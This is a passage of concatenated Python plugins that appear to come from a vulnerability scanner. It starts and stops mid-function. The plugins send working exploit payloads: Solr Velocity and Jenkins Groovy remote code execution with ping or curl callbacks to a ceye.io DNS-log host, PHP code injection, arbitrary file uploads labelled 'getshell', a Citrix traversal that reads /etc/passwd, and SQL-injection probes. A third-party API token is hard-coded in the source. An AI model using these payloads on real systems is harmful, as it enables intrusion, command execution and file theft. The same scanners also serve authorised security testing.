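        select_url = base + '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}.{}.ceye.io%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(
            ran, identifier)

        payload_data = """{
              "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true"
              }
            }"""
        json_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/json',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Accept-Encoding': 'gzip, deflate',
        }
        requests.post(config_url,
                      data=payload_data,
                      headers=json_headers,
                      timeout=6,
                      verify=False)
        resp2 = requests.get(select_url,
                             headers=headers,
                             timeout=6,
                             verify=False)

        dnslog = 'http://api.ceye.io/v1/records?token={}&type=dns&filter='.format(token)
        # Give the target time to run the template, spawn ping and resolve.
        time.sleep(5)
        resp3 = requests.get(dnslog, timeout=5, verify=False)
        con2 = resp2.text
        con3 = resp3.text
        if ran in con3:
            Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\n回显内容:{}\r\nDNSlog:{}\r\n".format(
                url, con2, con3)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, _)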
def medusa(Url: str, RandomAgent: str, Token, proxies=None) -> None:
    """Check a target for the LuHua OA SQL-injection signature and for an
    exposed get_user.aspx page, reporting hits through the result file and
    the vulnerability store.

    Url: target base URL; UrlProcessing() splits it into scheme, host, port.
    RandomAgent: User-Agent value sent with every request.
    Token: forwarded unchanged to VulnerabilityDetails(...).Write().
    proxies: optional proxy setting, normalised by ClassCongregation.Proxies().
    Returns nothing; failures are written to the error log, never raised.
    `urls` and `payload` are module-level names defined outside this listing.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL carried none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    for turl in urls:
        try:
            # NOTE: this URL omits the port, unlike the second probe below.
            payload_url = scheme + "://" + url + turl + payload
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            resp = requests.get(payload_url,
                                headers=headers,
                                proxies=proxies,
                                timeout=5,
                                verify=False)  # TLS certificate checking is disabled
            con = resp.text
            code = resp.status_code
            # Hit: HTTP 500 whose body contains the 'gqxmicrosoft' marker.
            if code == 500 and con.lower().find('gqxmicrosoft') != -1:
                Medusa = "{}存在璐华OA系统SQL注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                    url, payload_url)
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # write to file: url names the target file, Medusa is the result
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, Token).Write()  # store the url and the scan result
        except:  # bare except: also swallows KeyboardInterrupt / SystemExit
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _)  # log the error under the plugin name
    try:

        payload_url = scheme + "://" + url + ':' + str(
            port) + "/include/get_user.aspx"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        resp = requests.get(payload_url,
                            headers=headers,
                            proxies=proxies,
                            timeout=5,
                            verify=False)  # TLS certificate checking is disabled
        con = resp.text
        # Hit: the page body contains 'button_normal'.
        if con.lower().find('button_normal') != -1:
            # NOTE(review): this report text carries no finding title, unlike the one above.
            Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url names the target file, Medusa is the result
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()  # store the url and the scan result

    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log the error under the plugin name
def medusa(Url: str, RandomAgent: str, ProxyIp: str | None = None):
    """Jenkins /script console check: post a form body that embeds a random
    marker and report when that marker shows up in the response.

    Url: target base URL; UrlProcessing() splits it into scheme, host, port.
    RandomAgent: User-Agent value for the requests.
    ProxyIp: optional host:port used to build an http proxy mapping.
    Returns str(_t.info) on a hit, otherwise None. Any exception is swallowed
    by the bare except and written to the error log.
    """

    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL carried none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    # Responses are stored in module globals rather than locals; other
    # plugins in this file overwrite the same two names.
    global resp
    global resp2
    ran = ranstr(10)  # random marker; ranstr() is defined outside this listing
    # URL-encoded form body; the marker is substituted twice. A fixed
    # Jenkins-Crumb value is embedded in the literal.
    post_data = '''script%3dprintln+%22ping+%7b%7d.mdtx4t.ceye.io%22.execute().text%26Jenkins-Crumb%3d32bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%26json%3d%7b%22script%22%3a+%22println+%5c%22ping+%7b%7d.mdtx4t.ceye.io%5c%22.execute().text%22%2c+%22%22%3a+%22%22%2c+%22Jenkins-Crumb%22%3a+%2232bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%22%7d%26Submit%3d%e8%bf%90%e8%a1%8c'''.format(
        ran, ran)
    payload = "/script"

    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        s = requests.session()
        # Extract the cookie string from the repr of the session's cookie jar.
        # [0] raises IndexError (swallowed below) when no cookie was set.
        # This preliminary GET has no timeout and does not use ProxyIp.
        cookises = re.compile('.*Cookie (.*) for.*').findall(
            str(s.get(payload_url).cookies))[0]  # regex-extract the cookie string
        print(cookises)  # NOTE(review): writes the session cookie to stdout

        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Cookis': cookises  # NOTE(review): 'Cookis' is not a standard header name
        }

        if ProxyIp != None:
            proxies = {
                # "http": "http://" + str(ProxyIps) , # the proxy value must be prefixed with http:// or https://
                "http": "http://" + str(ProxyIp)
            }
            resp = s.post(payload_url,
                          headers=headers,
                          data=post_data,
                          timeout=6,
                          proxies=proxies,
                          verify=False)  # TLS certificate checking is disabled
        elif ProxyIp == None:
            resp = s.post(payload_url,
                          headers=headers,
                          data=post_data,
                          timeout=6,
                          verify=False)

        # NOTE(review): a third-party DNS-log API token is hard-coded below.
        # It is a credential and belongs in configuration, not in source.
        dnslog = 'http://api.ceye.io/v1/records?token=2e01a5af9e65acf90a94597fce586b49&type=http&filter='
        time.sleep(5)  # give the out-of-band log time to record a callback
        resp2 = requests.get(dnslog, timeout=5, verify=False)
        con = resp.text
        con2 = resp2.text
        # The hit is decided on the direct response only; the DNS-log text is
        # merely attached to the report.
        if con.find(ran) != -1:
            Medusa = "{}Jenkins配置不当导致未授权代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog{}\r\n".format(
                url, payload_url, con, con2)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # severity levels: serious, High, Intermediate, Low
            return (str(_t.info))
    except:  # bare except: also swallows KeyboardInterrupt / SystemExit
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log the error under the plugin name


#medusa('http://120.26.60.154:8080','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4')
def medusa(Url: str, RandomAgent: str, ProxyIp: str | None):
    """POST a crafted search form to /search.php and treat a phpinfo()-style
    page in a 200 response as confirmation of server-side code execution.

    Url: target base URL; UrlProcessing() splits it into scheme, host, port.
    RandomAgent: User-Agent value for the request.
    ProxyIp: optional host:port used to build an http proxy mapping.
    Returns str(_t.info) on a hit, otherwise None. Any exception is swallowed
    by the bare except and written to the error log.
    """

    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL carried none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    # Responses are stored in module globals rather than locals.
    global resp
    global resp2
    try:
        payload = "/search.php"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        payload_data = "searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Origin': scheme + '://' + url,
            'Referer': payload  # a path, not a full URL
        }

        s = requests.session()
        # The two branches differ only in proxies and timeout (6 s vs 5 s).
        if ProxyIp != None:
            proxies = {
                # "http": "http://" + str(ProxyIps) , # the proxy value must be prefixed with http:// or https://
                "http": "http://" + str(ProxyIp)
            }
            resp = s.post(payload_url,
                          headers=headers,
                          data=payload_data,
                          timeout=6,
                          proxies=proxies,
                          verify=False)  # TLS certificate checking is disabled
        elif ProxyIp == None:
            resp = s.post(payload_url,
                          headers=headers,
                          data=payload_data,
                          timeout=5,
                          verify=False)
        con = resp.text
        code = resp.status_code
        # Hit: HTTP 200 and all five phpinfo() section labels are present.
        if code == 200 and con.find('System') != -1 and con.find(
                'Compiler'
        ) != -1 and con.find('Build Date') != -1 and con.find(
                'IPv6 Support') != -1 and con.find('Configure Command') != -1:
            # con.encode(...) yields bytes, so the report embeds a b'...' repr.
            Medusa = "{} 存在远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, payload_url, con.encode(encoding='utf-8'))
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # severity levels: serious, High, Intermediate, Low
            return (str(_t.info))
    except:  # bare except: also swallows KeyboardInterrupt / SystemExit
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log the error under the plugin name


#medusa('http://192.168.0.146','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4')
def medusa(Url: str, RandomAgent: str, ProxyIp: str | None):
    """Jenkins checkScript check: send URL-encoded Groovy source carrying a
    random marker and report when the marker comes back in the response.

    Url: target base URL; UrlProcessing() splits it into scheme, host, port.
    RandomAgent: User-Agent value for the requests.
    ProxyIp: optional host:port used to build an http proxy mapping.
    Returns str(_t.info) on a hit, otherwise None. Any exception is swallowed
    by the bare except and written to the error log.
    """

    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL carried none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    # Responses are stored in module globals rather than locals.
    global resp
    global resp2
    try:
        ran = ranstr(10)  # random marker; ranstr() is defined outside this listing
        a = '''public class x {
          public x(){
            "curl %s.mdtx4t.ceye.io".execute()
          }
        }''' % ran
        payload2 = urllib.parse.quote(a)  # URL-encode the source so it fits in the query string
        payload1 = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value="
        payload_url = scheme + "://" + url + ':' + str(
            port) + payload1 + payload2
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept-Encoding':
            'gzip, deflate',
            'Accept-Language':
            'en',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        # NOTE(review): the proxy branch issues a GET while the non-proxy
        # branch issues a POST; the method difference looks unintended.
        if ProxyIp != None:
            proxies = {
                # "http": "http://" + str(ProxyIps) , # the proxy value must be prefixed with http:// or https://
                "http": "http://" + str(ProxyIp)
            }
            resp = requests.get(payload_url,
                                headers=headers,
                                timeout=6,
                                proxies=proxies,
                                verify=False)  # TLS certificate checking is disabled
        elif ProxyIp == None:
            resp = requests.post(payload_url,
                                 headers=headers,
                                 timeout=6,
                                 verify=False)

        # NOTE(review): a third-party DNS-log API token is hard-coded below.
        # It is a credential and belongs in configuration, not in source.
        dnslog = 'http://api.ceye.io/v1/records?token=2e01a5af9e65acf90a94597fce586b49&type=dns&filter='
        time.sleep(5)  # give the out-of-band log time to record a callback
        resp2 = requests.get(dnslog, timeout=5, verify=False)
        con = resp.text
        con2 = resp2.text
        # The hit is decided on the direct response only; the DNS-log text is
        # merely attached to the report.
        if con.find(ran) != -1:
            Medusa = "{}Jenkins远程命令执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog{}\r\n".format(
                url, payload_url, con, con2)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # severity levels: serious, High, Intermediate, Low
            return (str(_t.info))
    except:  # bare except: also swallows KeyboardInterrupt / SystemExit
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log the error under the plugin name
def medusa(Url: str, RandomAgent: str, proxies=None, **kwargs) -> None:
    """Solr VelocityResponseWriter check: list cores, enable the velocity
    writer on the last core returned, then query it with a template whose
    output is expected to look like `id` output.

    Url: target base URL; UrlProcessing() splits it into scheme, host, port.
    RandomAgent: User-Agent value for the requests.
    proxies: optional proxy setting, normalised by ClassCongregation.Proxies().
    kwargs: forwarded to VulnerabilityDetails(...).Write().
    Returns nothing; errors are reported through ErrorHandling/ErrorLog.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL carried none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url = scheme + "://" + url + ":" + str(
            port) + '/solr/admin/cores'
        # Step 1: core listing. Unlike the later requests this one keeps
        # default TLS verification. json.loads raises (caught below) when the
        # body is not JSON.
        step1 = requests.get(payload_url,
                             timeout=6,
                             proxies=proxies,
                             headers=headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            # Keeps whichever key is iterated last; only one core is probed.
            for x in data['status']:
                name = x
            payload = "/solr/" + name + "/config"
            payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
            payload_url1 = scheme + "://" + url + ":" + str(port) + payload
            payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
            # Step 2: config-API body that registers the velocity writer with
            # resource loading enabled.
            payload_data = """{
              "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true"
              }
            }"""
            headers1 = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/json',
                'Accept':
                'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language':
                'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
                'Accept-Encoding': 'gzip, deflate',
            }
            # The config POST's result is never inspected; resp is unused.
            resp = requests.post(payload_url1,
                                 data=payload_data,
                                 headers=headers1,
                                 proxies=proxies,
                                 timeout=6,
                                 verify=False)  # TLS certificate checking is disabled
            # Step 3: query through the writer and look at the rendered output.
            resp2 = requests.get(payload_url2,
                                 headers=headers,
                                 timeout=6,
                                 proxies=proxies,
                                 verify=False)
            con2 = resp2.text
            cod2 = resp2.status_code
            # Hit: HTTP 200 and the body carries the uid=/groups=/gid= fields.
            if con2.find("uid=") != -1 and con2.find(
                    "groups=") != -1 and con2.find(
                        "gid=") != -1 and cod2 == 200:
                Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nPayload:\r\n{}回显内容:{}\r\n\r\n".format(
                    url, payload_url2, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, **kwargs).Write()  # store the url and the scan result
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # write to file: url names the target file, Medusa is the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  # log the error with plugin name and target
def medusa(**kwargs) -> None:
    """Phpweb front-end upload check: obtain a token from /base/post.php,
    upload a marker file through /base/appfile.php, then fetch it back and
    report when the served file still contains the marker.

    kwargs: Url (target base URL, used as-is, no port handling), Headers
    (base header dict, mutated in place), Proxies (requests proxy mapping);
    all kwargs are also forwarded to VulnerabilityDetails(...).Write().
    Returns nothing; errors are reported through ErrorHandling/ErrorLog.
    """
    url = kwargs.get("Url")  # target url passed by the caller
    Headers = kwargs.get("Headers")  # header dict passed by the caller
    proxies = kwargs.get("Proxies")  # proxy mapping passed by the caller
    try:
        payload1 = "/base/post.php"
        payload_url1 = url + payload1
        dada = "act=appcode"
        payload2 = "/base/appfile.php"
        payload_url2 = url + payload2
        ran = ClassCongregation.randoms().result(10)  # random marker, also used as the file name stem
        payload_url3 = url + "/effect/source/bg/{}.txt".format(ran)
        # NOTE(review): Headers1 and Headers2 are the same object as Headers
        # (no copy is made), so the second Content-Type assignment below
        # overwrites the first and both POSTs carry the multipart value; the
        # caller's dict is mutated as a side effect.
        Headers1 = Headers
        Headers2 = Headers
        Headers1['Accept'] = '*/*'
        Headers1['Content-Type'] = 'application/x-www-form-urlencoded'

        Headers2['Accept'] = '*/*'
        Headers2[
            'Content-Type'] = 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE'

        # Step 1: fetch the response that carries the k= token.
        resp = requests.post(payload_url1,
                             data=dada,
                             proxies=proxies,
                             headers=Headers1,
                             timeout=5,
                             verify=False)  # TLS certificate checking is disabled
        con = resp.text
        # .group(1) raises AttributeError (caught below) when there is no match.
        k = re.match('k=(.*?)&', con, re.M | re.I).group(1)  # extract the value of k
        md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()  # md5 of k followed by "1"
        # Step 2: hand-built multipart body; placeholders are filled with
        # ran (file name), ran (file content) and md5_en (field m).
        dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="file"; filename="{}.txt"
Content-Type: application/octet-stream

{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="t"

1
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="m"

{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="act"

upload
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="r_size"

10
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="submit"

getshell
------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en)
        # The upload response (resp2) is never inspected.
        resp2 = requests.post(payload_url2,
                              data=dada2,
                              proxies=proxies,
                              headers=Headers2,
                              timeout=5,
                              verify=False)
        # Step 3: fetch the expected file location and check for the marker.
        resp3 = requests.get(payload_url3,
                             headers=Headers1,
                             proxies=proxies,
                             timeout=5,
                             verify=False)
        code3 = resp3.status_code
        con3 = resp3.text
        # Hit: the file is served (200) and contains the random marker.
        if code3 == 200 and con3.find(ran) != -1:
            Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, payload_url2, dada2, payload_url3, con3)
            _t = VulnerabilityInfo(Medusa)
            # NOTE: resp3 (a Response object) is passed where other plugins pass url.
            ClassCongregation.VulnerabilityDetails(
                _t.info, resp3, **kwargs).Write()  # store the scan result
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url names the target file, Medusa is the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  # log the error with plugin name and target
def medusa(Url: str, RandomAgent: str, UnixTimestamp) -> None:
    """Editor img_save.asp upload check: post a multipart body containing the
    'testvul' marker, fetch the file name echoed back by the server, and
    report when the served file still contains the marker.

    Url: target base URL; UrlProcessing() splits it into scheme, host, port.
    RandomAgent: User-Agent value for the requests.
    UnixTimestamp: forwarded unchanged to VulnerabilityDetails(...).Write().
    Returns nothing; any exception is written to the error log.
    """

    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL carried none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:
        payload = "/library/editornew/Editor/img_save.asp"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        # Multipart body sent verbatim, including the leading indentation of
        # every line (it is part of the literal).
        data = '''
                        ------WebKitFormBoundaryNjZKAB66SVyL1INA
                        Content-Disposition: form-data; name="img_src"; filename="123.cer"
                        Content-Type: application/x-x509-ca-cert

                        testvul
                        ------WebKitFormBoundaryNjZKAB66SVyL1INA
                        Content-Disposition: form-data; name="Submit"

                        提交
                        ------WebKitFormBoundaryNjZKAB66SVyL1INA
                        Content-Disposition: form-data; name="img_alt"


                        ------WebKitFormBoundaryNjZKAB66SVyL1INA
                        Content-Disposition: form-data; name="img_align"

                        baseline
                        ------WebKitFormBoundaryNjZKAB66SVyL1INA
                        Content-Disposition: form-data; name="img_border"


                        ------WebKitFormBoundaryNjZKAB66SVyL1INA
                        Content-Disposition: form-data; name="newid"

                        45
                        ------WebKitFormBoundaryNjZKAB66SVyL1INA
                        Content-Disposition: form-data; name="img_hspace"


                        ------WebKitFormBoundaryNjZKAB66SVyL1INA
                        Content-Disposition: form-data; name="img_vspace"


                        ------WebKitFormBoundaryNjZKAB66SVyL1INA--
                        '''

        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)  # TLS certificate checking is disabled
        con = resp.text
        # The server is expected to echo the stored file name as getimg('<digits>.cer').
        match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
        if match:
            payload_url2 = scheme + "://" + url + ":" + str(
                port) + "/library/editornew/Editor/NewImage/" + match.group(1)
            resp2 = s.get(payload_url2,
                          headers=headers,
                          timeout=6,
                          verify=False)
            con2 = resp2.text
            code2 = resp2.status_code
            # Hit: the stored file is served (200) and still holds the marker.
            if code2 == 200 and con2.lower().find("testvul") != -1:
                Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
                    url, payload_url2, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()  # store the url and the scan result
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # write to file: url names the target file, Medusa is the result
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log the error under the plugin name
def medusa(Url: str, RandomAgent: str, UnixTimestamp) -> None:
    """Citrix VPN portal traversal check: post a bookmark whose title is a
    random marker, then fetch the .xml the portal writes for it and report
    when that response looks like a passwd file.

    Url: target base URL; UrlProcessing() splits it into scheme, host, port.
    RandomAgent: User-Agent value for the requests.
    UnixTimestamp: forwarded unchanged to VulnerabilityDetails(...).Write().
    Returns nothing; any exception is written to the error log.
    `rand()` is defined outside this listing.
    """

    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL carried none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    payload = "/vpn/../vpns/portal/scripts/newbm.pl"
    payload_url = scheme + "://" + url + ":" + str(port) + payload
    randoms = rand()
    try:
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            "Connection": "close",
            # The NSC_USER value appears redacted in this listing; .format()
            # has no placeholder to fill, so randoms is not inserted here.
            "NSC_USER":
            "******".format(randoms),
            "NSC_NONCE": "nsroot"
        }
        data = "url=http://example.com&title={}&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]".format(
            randoms)
        resp = requests.post(payload_url,
                             data=data,
                             headers=headers,
                             timeout=5,
                             verify=False,  # TLS certificate checking is disabled
                             allow_redirects=False)
        con = resp.text
        code = resp.status_code
        # Step 1 succeeded if the portal script answers with its reload stub.
        if code == 200 and con.find("parent.window.ns_reload") != -1:
            payload_url2 = scheme + "://" + url + ":" + str(
                port) + '/vpn/../vpns/portal/{}.xml'.format(randoms)
            headers2 = {
                "NSC_USER": "******",  # redacted in this listing
                "NSC_NONCE": "nsroot",
                "Upgrade-Insecure-Requests": "1",
                "Cache-Control": "max-age=0",
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'Accept-Language': 'en',
                'User-Agent': RandomAgent,
            }
            resp2 = requests.get(payload_url2,
                                 headers=headers2,
                                 timeout=5,
                                 verify=False)
            con2 = resp2.text
            code2 = resp2.status_code
            # Hit: HTTP 200 and the body carries typical passwd-file tokens.
            if code2 == 200 and con2.find("root:") != -1 and con2.find(
                    "bin:") != -1 and con2.find("/root") != -1:
                Medusa = "{} 存在Citrix远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n使用POST数据包:\r\n{}\r\n返回数据包:\r\n{}\r\n".format(
                    url, payload_url2, data, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()  # store the url and the scan result
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # write to file: url names the target file, Medusa is the result
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log the error under the plugin name


# if __name__ == '__main__':
#
#     with open(r'../123.txt', 'r') as file:
#         content_lists = file.readlines()
#         url = [x.strip() for x in content_lists]
#         for l in url:
#             medusa(l)
#medusa("http://","Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)")
def medusa(Url: str, RandomAgent: str, ProxyIp) -> None:
    """Time-based SQL-injection check over a list of .aspx endpoints: each
    endpoint is requested twice with two DBMS_PIPE delay payloads and the
    difference in response time decides the hit.

    Url: target base URL; UrlProcessing() splits it into scheme, host, port.
    RandomAgent: User-Agent value for the requests.
    ProxyIp: accepted but never used in this function.
    Returns nothing; failures are written to the error log per endpoint.
    """

    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL carried none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    urls = [
        '/Plan/TitleShow/ApplyInfo.aspx?ApplyID=1',
        '/Price/AVL/AVLPriceTrends_SQU.aspx?classId=1',
        '/Price/SuggestList.aspx?priceid=1',
        '/PriceDetail/PriceComposition_Formula.aspx?indexNum=3&elementId=1',
        '/Products/Category/CategoryOption.aspx?option=IsStop&classId=1',
        '/Products/Tiens/CategoryStockView.aspx?id=1',
        '/custom/CompanyCGList.aspx?ComId=1',
        '/SuperMarket/InterestInfoDetail.aspx?ItemId=1',
        '/Orders/k3orderdetail.aspx?FINTERID=1',
        '/custom/GroupNewsList.aspx?child=true&groupId=121'
    ]
